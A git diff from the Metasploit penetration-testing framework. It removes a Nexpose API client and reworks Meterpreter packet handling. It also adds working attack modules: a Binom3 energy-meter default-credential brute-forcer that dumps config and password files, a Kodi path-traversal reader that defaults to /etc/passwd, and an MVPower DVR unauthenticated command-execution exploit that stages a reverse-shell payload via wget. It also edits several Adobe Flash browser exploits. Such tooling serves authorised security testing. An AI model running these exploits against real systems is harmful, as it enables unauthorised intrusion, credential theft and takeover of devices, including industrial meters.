-    xml = '<ReportConfig id="' + @config_id.to_s + '" name="' + @name.to_s + '" template-id="' + @template_id.to_s + '" format="' + @format.to_s + '">'
-
-    xml += ' <Filters>'
-
-    @filters.each do |f|
-      xml += ' <' + f.type.to_s + ' id="' + f.id.to_s + '"/>'
-    end
-
-    xml += ' </Filters>'
-
-    xml += ' <Generate after-scan="' + @generate_after_scan.to_s + '">'
-
-    if (@schedule)
-      xml += ' <Schedule type="' + @schedule.type.to_s + '" interval="' + @schedule.interval.to_s + '" start="' + @schedule.start.to_s + '"/>'
-    end
-
-    xml += ' </Generate>'
-
-    xml += ' <Delivery>'
-
-    xml += ' <Storage storeOnServer="' + @storeOnServer.to_s + '">'
-
-    if (@store_location and @store_location.length > 0)
-      xml += ' <location>' + @store_location.to_s + '</location>'
-    end
-
-    xml += ' </Storage>'
-
-
-    xml += ' </Delivery>'
-
-    xml += ' </ReportConfig>'
-
-    return xml
-  end
-
-  def set_name(name)
-    @name = name
-  end
-
-  def set_template_id(template_id)
-    @template_id = template_id
-  end
-
-  def set_format(format)
-    @format = format
-  end
-
-  def set_email_As(email_As)
-    @email_As = email_As
-  end
-
-  def set_storeOnServer(storeOnServer)
-    @storeOnServer = storeOnServer
-  end
-
-  def set_smtp_relay_server(smtp_relay_server)
-    @smtp_relay_server = smtp_relay_server
-  end
-
-  def set_sender(sender)
-    @sender = sender
-  end
-
-  def set_generate_after_scan(generate_after_scan)
-    @generate_after_scan = generate_after_scan
-  end
-end
-
-# === Description
-# Object that represents a report filter which determines which sites, asset
-# groups, and/or devices that a report is run against.  gtypes are
-# "SiteFilter", "AssetGroupFilter", "DeviceFilter", or "ScanFilter".  gid is
-# the site-id, assetgroup-id, or devce-id.  ScanFilter, if used, specifies
-# a specifies a specific scan to use as the data source for the report. The gid
-# can be a specific scan-id or "first" for the first run scan, or “last” for
-# the last run scan.
-#
-class ReportFilter
-
-  attr_reader :type
-  attr_reader :id
-
-  def initialize(type, id)
-
-    @type = type
-    @id = id
-
-  end
-
-end
-
-# === Description
-# Object that represents the schedule on which to automatically generate new reports.
-#
-class ReportSchedule
-
-  # The type of schedule
-  # (daily, hourly, monthly, weekly)
-  attr_reader :type
-  # The frequency with which to run the scan
-  attr_reader :interval
-  # The earliest date to generate the report
-  attr_reader :start
-
-  def initialize(type, interval, start)
-
-    @type = type
-    @interval = interval
-    @start = start
-
-  end
-
-
-end
-
-class ReportTemplateListing
-
-  attr_reader :error_msg
-  attr_reader :error
-  attr_reader :request_xml
-  attr_reader :response_xml
-  attr_reader :connection
-  attr_reader :xml_tag_stack
-  attr_reader :report_template_summaries#;  //Array (ReportTemplateSummary*)
-
-
-  def ReportTemplateListing(connection)
-
-    @error = nil
-    @connection = connection
-    @report_template_summaries = Array.new()
-
-    r = @connection.execute('<ReportTemplateListingRequest session-id="' + connection.session_id.to_s + '"/>')
-    if (r.success)
-      r.res.elements.each('ReportTemplateListingResponse/ReportTemplateSummary') do |r|
-        @report_template_summaries.push(ReportTemplateSumary.new(r.attributes['id'],r.attributes['name']))
-      end
-    else
-      @error = true
-      @error_msg = 'ReportTemplateListingRequest Parse Error'
-    end
-
-  end
-
-end
-
-
-class ReportTemplateSummary
-
-  attr_reader :id
-  attr_reader :name
-  attr_reader :description
-
-  def ReportTemplateSummary(id, name, description)
-
-    @id = id
-    @name = name
-    @description = description
-
-  end
-
-end
-
-
-class ReportSection
-
-  attr_reader :name
-  attr_reader :properties
-
-  def ReportSection(name)
-
-    @properties = Array.new()
-    @name = name
-  end
-
-
-  def addProperty(name, value)
-
-    @properties[name.to_s] = value
-  end
-
-end
-
-
-# TODO add
-def self.site_device_scan(connection, site_id, device_array, host_array, debug = false)
-
-  request_xml = '<SiteDevicesScanRequest session-id="' + connection.session_id.to_s + '" site-id="' + site_id.to_s + '">'
-  request_xml += '<Devices>'
-  device_array.each do |d|
-    request_xml += '<device id="' + d.to_s + '"/>'
-  end
-  request_xml += '</Devices>'
-  request_xml += '<Hosts>'
-  # The host array can only by single IP addresses for now. TODO: Expand to full API Spec.
-  host_array.each do |h|
-    request_xml += '<range from="' + h.to_s + '"/>'
-  end
-  request_xml += '</Hosts>'
-  request_xml += '</SiteDevicesScanRequest>'
-
-  r = connection.execute(request_xml)
-  r.success ? { :engine_id => r.attributes['engine_id'], :scan_id => r.attributes['scan-id'] } : nil
-end
-
-# === Description
-# TODO
-def self.getAttribute(attribute, xml)
-  value = ''
-  #@value = substr(substr(strstr(strstr(@xml,@attribute),'"'),1),0,strpos(substr(strstr(strstr(@xml,@attribute),'"'),1),'"'))
-  return value
-end
-
-# === Description
-# Returns an ISO 8601 formatted date/time stamp. All dates in Nexpose must use this format.
-def self.get_iso_8601_date(int_date)
-#@date_mod = date('Ymd\THis000', @int_date)
-  date_mod = ''
-return date_mod
-end
-
-# ==== Description
-# Echos the last XML API request and response for the specified object.  (Useful for debugging)
-def self.printXML(object)
-  puts "request" + object.request_xml.to_s
-  puts "response is " + object.response_xml.to_s
-end
-
-end
diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb
index cb4a95702b..21bd21ac35 100644
--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -284,6 +284,20 @@ module PacketDispatcher
   # Reception
   #
   ##
+
+  #
+  # Simple class to track packets and if they are in-progress or complete.
+  #
+  class QueuedPacket
+    attr_reader :packet
+    attr_reader :in_progress
+
+    def initialize(packet, in_progress)
+      @packet = packet
+      @in_progress = in_progress
+    end
+  end
+
   #
   # Monitors the PacketDispatcher's sock for data in its own
   # thread context and parsers all inbound packets.
@@ -306,8 +320,8 @@ module PacketDispatcher
         begin
           rv = Rex::ThreadSafe.select([ self.sock.fd ], nil, nil, PING_TIME)
           if rv
-            packet = receive_packet
-            @pqueue << packet if packet
+            packet, in_progress = receive_packet
+            @pqueue << QueuedPacket.new(packet, in_progress)
           elsif self.send_keepalives && @pqueue.empty?
             keepalive
           end
@@ -342,11 +356,11 @@ module PacketDispatcher
         tmp_channel = []
         tmp_close   = []
         backlog.each do |pkt|
-          if(pkt.response?)
+          if(pkt.packet.response?)
             tmp_command << pkt
             next
           end
-          if(pkt.method == "core_channel_close")
+          if(pkt.packet.method == "core_channel_close")
             tmp_close << pkt
             next
           end
@@ -365,7 +379,7 @@ module PacketDispatcher
         backlog.each do |pkt|
 
           begin
-          if ! dispatch_inbound_packet(pkt)
+          if ! dispatch_inbound_packet(pkt.packet, pkt.in_progress)
             # Keep Packets in the receive queue until a handler is registered
             # for them. Packets will live in the receive queue for up to
             # PACKET_TIMEOUT seconds, after which they will be dropped.
@@ -373,13 +387,15 @@ module PacketDispatcher
             # A common reason why there would not immediately be a handler for
             # a received Packet is in channels, where a connection may
             # open and receive data before anything has asked to read.
-            if (::Time.now.to_i - pkt.created_at.to_i < PACKET_TIMEOUT)
+            #
+            # Also, don't bother saving incomplete packets if we have no handler.
+            if (!pkt.in_progress and ::Time.now.to_i - pkt.packet.created_at.to_i < PACKET_TIMEOUT)
               incomplete << pkt
             end
           end
 
           rescue ::Exception => e
-            dlog("Dispatching exception with packet #{pkt}: #{e} #{e.backtrace}", 'meterpreter', LEV_1)
+            dlog("Dispatching exception with packet #{pkt.packet}: #{e} #{e.backtrace}", 'meterpreter', LEV_1)
           end
         end
 
@@ -459,12 +475,16 @@ module PacketDispatcher
   # Notifies a whomever is waiting for a the supplied response,
   # if anyone.
   #
-  def notify_response_waiter(response)
+  # For not-yet-complete responses, we might not be able to determine
+  # the response ID, in that case just let all waiters know that some
+  # responses are trickling in.
+  #
+  def notify_response_waiter(response, in_progress=false)
     handled = false
     self.waiters.each() { |waiter|
-      if (waiter.waiting_for?(response))
-        waiter.notify(response)
-        remove_response_waiter(waiter)
+      if (in_progress || waiter.waiting_for?(response))
+        waiter.notify(response, in_progress)
+        remove_response_waiter(waiter) unless in_progress
         handled = true
         break
       end
@@ -498,7 +518,7 @@ module PacketDispatcher
   # Otherwise, the packet is passed onto any registered dispatch
   # handlers until one returns success.
   #
-  def dispatch_inbound_packet(packet)
+  def dispatch_inbound_packet(packet, in_progress=false)
     handled = false
 
     # Update our last reply time
@@ -507,7 +527,7 @@ module PacketDispatcher
     # If the packet is a response, try to notify any potential
     # waiters
     if packet.response?
-      if (notify_response_waiter(packet))
+      if (notify_response_waiter(packet, in_progress))
         return true
       end
     end
diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb
index 5b33c7b7c5..4575381790 100644
--- a/lib/rex/post/meterpreter/packet_parser.rb
+++ b/lib/rex/post/meterpreter/packet_parser.rb
@@ -75,22 +75,27 @@ class PacketParser
       end
     end
 
+    in_progress = true
+
+    # TODO: cipher decryption
+    if (cipher)
+    end
+
+    # Deserialize the packet from the raw buffer
+    packet.from_r(self.raw)
+
     # If we've finished reading the entire packet
     if ((self.hdr_length_left == 0) &&
         (self.payload_length_left == 0))
 
-      # TODO: cipher decryption
-      if (cipher)
-      end
-
-      # Deserialize the packet from the raw buffer
-      packet.from_r(self.raw)
-
       # Reset our state
       reset
 
-      return packet
+      # packet is complete!
+      in_progress = false
     end
+
+    return packet, in_progress
   end
 
 protected
diff --git a/lib/rex/post/meterpreter/packet_response_waiter.rb b/lib/rex/post/meterpreter/packet_response_waiter.rb
index 5f2f1557d7..637e1b9a95 100644
--- a/lib/rex/post/meterpreter/packet_response_waiter.rb
+++ b/lib/rex/post/meterpreter/packet_response_waiter.rb
@@ -39,6 +39,9 @@ class PacketResponseWaiter
   # @return [Integer] request ID to wait for
   attr_accessor :rid
 
+  # @return [Boolean] indicates if part of the response has been received
+  attr_accessor :in_progress
+
   #
   # Initializes a response waiter instance for the supplied request
   # identifier.
@@ -46,6 +49,7 @@ class PacketResponseWaiter
   def initialize(rid, completion_routine = nil, completion_param = nil)
     self.rid      = rid.dup
     self.response = nil
+    self.in_progress = false
 
     if (completion_routine)
       self.completion_routine = completion_routine
@@ -69,14 +73,21 @@ class PacketResponseWaiter
   #
   # @param response [Packet]
   # @return [void]
-  def notify(response)
+  def notify(response, in_progress = false)
     if (self.completion_routine)
-      self.response = response
-      self.completion_routine.call(response, self.completion_param)
+      self.in_progress = in_progress
+      unless in_progress
+        self.response = response
+        self.completion_routine.call(response, self.completion_param)
+      end
     else
       self.mutex.synchronize do
-        self.response = response
-        self.cond.signal
+        self.in_progress = in_progress
+        unless in_progress
+          # complete packet, ready for processing...
+          self.response = response
+          self.cond.signal
+        end
       end
     end
   end
@@ -92,7 +103,11 @@ class PacketResponseWaiter
     interval = nil if interval and interval == -1
     self.mutex.synchronize do
       if self.response.nil?
-        self.cond.wait(self.mutex, interval)
+        loop do
+          self.cond.wait(self.mutex, interval)
+          break unless self.in_progress
+          self.in_progress = false
+        end
       end
     end
     return self.response
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 1d985f324b..b3691681fb 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.2.14'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.2.15'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.7'
   # Needed by msfgui and other rpc components
@@ -163,4 +163,6 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'openvas-omp'
   # Needed by metasploit nessus bridge
   spec.add_runtime_dependency 'nessus_rest'
+  # Nexpose Gem
+  spec.add_runtime_dependency 'nexpose'
 end
diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
index c0636e47c6..6e20542aee 100644
--- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
+++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
-require 'rapid7/nexpose'
+require 'nexpose'
 
 class MetasploitModule < Msf::Auxiliary
 
@@ -74,9 +74,10 @@ class MetasploitModule < Msf::Auxiliary
   def run
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
+    trust_store = datastore['TRUST_STORE']
     prot = ssl ? 'https' : 'http'
 
-    nsc = Nexpose::Connection.new(rhost, user, pass, rport)
+    nsc = Nexpose::Connection.new(rhost, user, pass, rport, nil, nil, trust_store)
 
     print_status("Authenticating as: " << user)
     begin
@@ -140,7 +141,7 @@ class MetasploitModule < Msf::Auxiliary
 
     print_status("Cleaning up")
     begin
-      nsc.site_delete id
+      nsc.delete_site id
     rescue
       print_warning("Error while cleaning up site ID, manual cleanup required!")
     end
diff --git a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb
new file mode 100644
index 0000000000..f07ad9bb96
--- /dev/null
+++ b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb
@@ -0,0 +1,208 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => 'Binom3 Web Management Login Scanner, Config and Password File Dump',
+      'Description' => %{
+          This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer
+          management login portal(s), and attempts to identify valid credentials.
+          There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'.
+          In addition to device config, 'root' user can also access password file.
+          Other users - admin, alg, user - can only access configuration file.
+          The module attempts to download configuration and password files depending on the login user credentials found.
+      },
+      'References' =>
+        [
+          ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01']
+        ],
+      'Author' =>
+        [
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
+        ],
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => { 'VERBOSE' => true })
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),	# Application may run on a different port too. Change port accordingly.
+        OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'root']),
+        OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'root'])
+      ], self.class
+    )
+  end
+
+  def run_host(ip)
+    unless is_app_binom3?
+      return
+    end
+
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  #
+  # Check if App is Binom3
+  #
+
+  def is_app_binom3?
+    begin
+      res = send_request_cgi(
+        {
+          'uri' => '/',
+          'method' => 'GET'
+        }
+      )
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Team-R Web') || res.body.include?('binom_ico') || res.body.include?('team-r')))
+
+      print_good("#{rhost}:#{rport} - Binom3 confirmed...")
+
+      return true
+    else
+      print_error("#{rhost}:#{rport} - Application does not appear to be Binom3. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Brute-force the login page
+  #
+
+  def do_login(user, pass)
+    print_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    begin
+
+      res = send_request_cgi(
+        {
+          'uri' => '/~login',
+          'method' => 'POST',
+          'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
+          'vars_post' =>
+            {
+              'login' => user,
+              'password' => pass
+            }
+        }
+      )
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+
+      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return :abort
+
+    end
+
+    if (res && res.code == 302 && res.get_cookies.include?('IDSESSION'))
+
+      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'Binom3',
+        user: user,
+        password: pass
+      )
+
+      # Set Cookie
+
+      get_cookie = res.get_cookies
+      cookie = get_cookie + ' NO-HELP=true; onlyRu=1'
+
+      # Attempting to download config file
+
+      config_uri = '~cfg_ask_xml?type=cfg'
+
+      res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie })
+
+      if res && res.code == 200
+        vprint_status('++++++++++++++++++++++++++++++++++++++')
+        vprint_status("#{rhost} - dumping configuration")
+        vprint_status('++++++++++++++++++++++++++++++++++++++')
+
+        print_good("#{rhost}:#{rport} - Configuration file retrieved successfully!")
+        path = store_loot(
+          'Binom3_config',
+          'text/xml',
+          rhost,
+          res.body,
+          rport,
+          'Binom3 device config'
+        )
+        print_status("#{rhost}:#{rport} - Configuration file saved in: #{path}")
+      else
+        print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
+        return
+      end
+
+      # Attempt to dump password file
+      config_uri = '~cfg_ask_xml?type=passw'
+      res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie })
+
+      if res && res.code == 200
+        vprint_status('++++++++++++++++++++++++++++++++++++++')
+        vprint_status("#{rhost} - dumping password file")
+        vprint_status('++++++++++++++++++++++++++++++++++++++')
+
+        print_good("#{rhost}:#{rport} - Password file retrieved successfully!")
+        path = store_loot(
+          'Binom3_passw',
+          'text/xml',
+          rhost,
+          res.body,
+          rport,
+          'Binom3 device config'
+        )
+        print_status("#{rhost}:#{rport} - Password file saved in: #{path}")
+      else
+        return
+      end
+    else
+      print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+    end
+  end
+end
diff --git a/modules/auxiliary/scanner/http/kodi_traversal.rb b/modules/auxiliary/scanner/http/kodi_traversal.rb
new file mode 100644
index 0000000000..b3997770ca
--- /dev/null
+++ b/modules/auxiliary/scanner/http/kodi_traversal.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kodi 17.0 Local File Inclusion Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal flaw found in Kodi before 17.1.
+      },
+      'References'     =>
+        [
+          ['CVE', '2017-5982'],
+        ],
+      'Author'         =>
+        [
+          'Eric Flokstra',  #Original
+          'jvoisin'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Feb 12 2017"
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
+        OptString.new('FILE',      [true, 'The file to obtain', '/etc/passwd']),
+        OptInt.new('DEPTH',        [true, 'The max traversal depth to root directory', 10])
+      ], self.class)
+  end
+
+
+  def run_host(ip)
+    base = normalize_uri(target_uri.path)
+
+    peer = "#{ip}:#{rport}"
+
+    print_status("Reading '#{datastore['FILE']}'")
+
+    traverse = '../' * datastore['DEPTH']
+    f = datastore['FILE']
+    f = f[1, f.length] if f =~ /^\//
+    f = "image/image://" + Rex::Text.uri_encode(traverse + f, "hex-all")
+
+    uri = normalize_uri(base, Rex::Text.uri_encode(f, "hex-all"))
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    if res and res.code != 200
+      print_error("Unable to read '#{datastore['FILE']}', possibily because:")
+      print_error("\t1. File does not exist.")
+      print_error("\t2. No permission.")
+
+    elsif res and res.code == 200
+      data = res.body.lstrip
+      fname = datastore['FILE']
+      p = store_loot(
+        'kodi',
+        'application/octet-stream',
+        ip,
+        data,
+        fname
+      )
+
+      vprint_line(data)
+      print_good("#{fname} stored as '#{p}'")
+
+    else
+      print_error('Fail to obtain file for some unknown reason')
+    end
+  end
+
+end
diff --git a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
new file mode 100644
index 0000000000..44154f54df
--- /dev/null
+++ b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'MVPower DVR Shell Unauthenticated Command Execution',
+      'Description' => %q{
+        This module exploits an unauthenticated remote command execution
+        vulnerability in MVPower digital video recorders. The 'shell' file
+        on the web interface executes arbitrary operating system commands in
+        the query string.
+
+        This module was tested successfully on a MVPower model TV-7104HE with
+        firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+        The TV-7108HE model is also reportedly affected, but untested.
+      },
+      'Author'      =>
+        [
+          'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
+          'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'References'  =>
+        [
+          # Comment from Paul Davies contains probably the first published PoC
+          [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
+          # Writeup with PoC by Andrew Tierney from Pen Test Partners
+          [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
+        ],
+      'DisclosureDate' => 'Aug 23 2015',
+      'Privileged'     => true, # BusyBox
+      'Arch'           => ARCH_ARMLE,
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
+          'CMDSTAGER::FLAVOR' => 'wget'
+        },
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'CmdStagerFlavor' => %w{ echo printf wget },
+      'DefaultTarget'   => 0))
+  end
+
+  def check
+    begin
+      fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
+      res = send_request_cgi(
+        'uri' => "/shell?echo+#{fingerprint}",
+        'headers' => { 'Connection' => 'Keep-Alive' }
+      )
+      if res && res.body.include?(fingerprint)
+        return CheckCode::Vulnerable
+      end
+    rescue ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      send_request_cgi(
+        'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
+        'headers' => { 'Connection' => 'Keep-Alive' }
+      )
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Connecting to target")
+
+    unless check == CheckCode::Vulnerable
+      fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
+    end
+
+    print_good("#{peer} - Target is vulnerable!")
+
+    execute_cmdstager(linemax: 1500)
+  end
+end
diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb
index 39112c8f94..ee0bd5ed76 100644
--- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb
+++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC'             => 'process',
           'HTTP::compression' => 'gzip',
           'HTTP::chunked'     => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb
index 20550092a5..89371513f5 100644
--- a/modules/exploits/windows/browser/adobe_flash_avm2.rb
+++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false
         },
       'Platform'       => 'win',
diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
index 7d18fb3de6..4630fa186b 100644
--- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
+++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false,
           'EXITFUNC'             => "thread"
         },
diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
index 3e0b780952..4574cbf54b 100644
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb
index 4f831045aa..14e13e7d70 100644
--- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb
+++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
index 3d5fea3c40..d9586cbf27 100644
--- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb
+++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false
         },
       'Platform'       => 'win',
diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
index 84bc9cf971..37ea120c5a 100644
--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb
index b2d3ce686c..d87f5ffc0e 100644
--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
index 3c0a8c62b0..b74acc6da8 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC'             => 'process',
           'HTTP::compression'    => 'gzip',
           'HTTP::chunked'        => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
index b20663ea80..9f12cf5b73 100644
